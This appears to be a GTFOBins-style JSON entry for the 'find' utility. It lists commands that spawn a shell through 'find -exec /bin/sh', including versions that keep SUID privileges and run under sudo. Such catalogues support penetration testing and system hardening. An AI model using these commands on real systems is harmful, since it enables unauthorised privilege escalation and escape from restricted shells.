You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

19 lines
292 B
JSON

{
"functions": {
"shell": [
{
"code": "find . -exec /bin/sh \\; -quit"
}
],
"suid": [
{
"code": "./find . -exec /bin/sh -p \\; -quit"
}
],
"sudo": [
{
"code": "sudo find . -exec /bin/sh \\; -quit"
}
]
}
}